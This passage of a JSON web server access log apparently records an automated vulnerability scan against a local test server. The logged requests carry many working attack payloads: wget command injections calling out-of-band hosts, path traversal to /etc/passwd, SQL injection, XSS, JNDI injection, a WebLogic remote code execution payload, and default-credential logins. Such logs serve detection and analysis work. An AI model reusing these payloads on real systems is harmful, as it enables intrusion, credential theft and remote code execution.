+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/..;/css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"{\x22metadata\x22:{\x22order_id\x22:\x221 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)\x22},\x22status\x22:2}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=command&command=set_city_timezone&value=$(wget%20http://ca2tuc8smpv1g2s80ca086o87t4bb6kng.oast.pro)) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /anchor/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.zsh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/81 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup2.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phppgadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/pprof/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cache/backup/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.091","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /neos/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.096","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version.web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //https:example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/82 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sysmgmt/2015/bmc/session HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status?full HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"key=';`wget http://ca2tuc8smpv1g2s80ca0a4was3yy5xj33.oast.pro`;#","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/pprof/goroutine?debug=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"login=admin&pwd=admin&lang=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /op/op.Login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /darkstat/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22read\x22,\x0D\x0A \x22mbean\x22:\x22java.lang:type=Memory\x22,\x0D\x0A \x22target\x22:{\x0D\x0A \x22url\x22:\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jolokia/read/getDiagnosticOptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/dbstat/gettablessize HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //http://127.0.0.1example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/83 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"j_username=admin&j_password=password","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pentaho/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?m=member&f=login_save HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/registry-clients HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/mysql2i/mysql2i.func.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\x22connectionHandler\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\x22getServletRequest\x22).invoke(obj); String cmd = req.getHeader(\x22CMD\x22);String[] cmds = System.getProperty(\x22os.name\x22).toLowerCase().contains(\x22window\x22) ? new String[]{\x22cmd.exe\x22, \x22/c\x22, cmd} : new String[]{\x22/bin/sh\x22, \x22-c\x22, cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(\x22\x5C\x5CA\x22).next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\x22getResponse\x22).invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/console?.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ 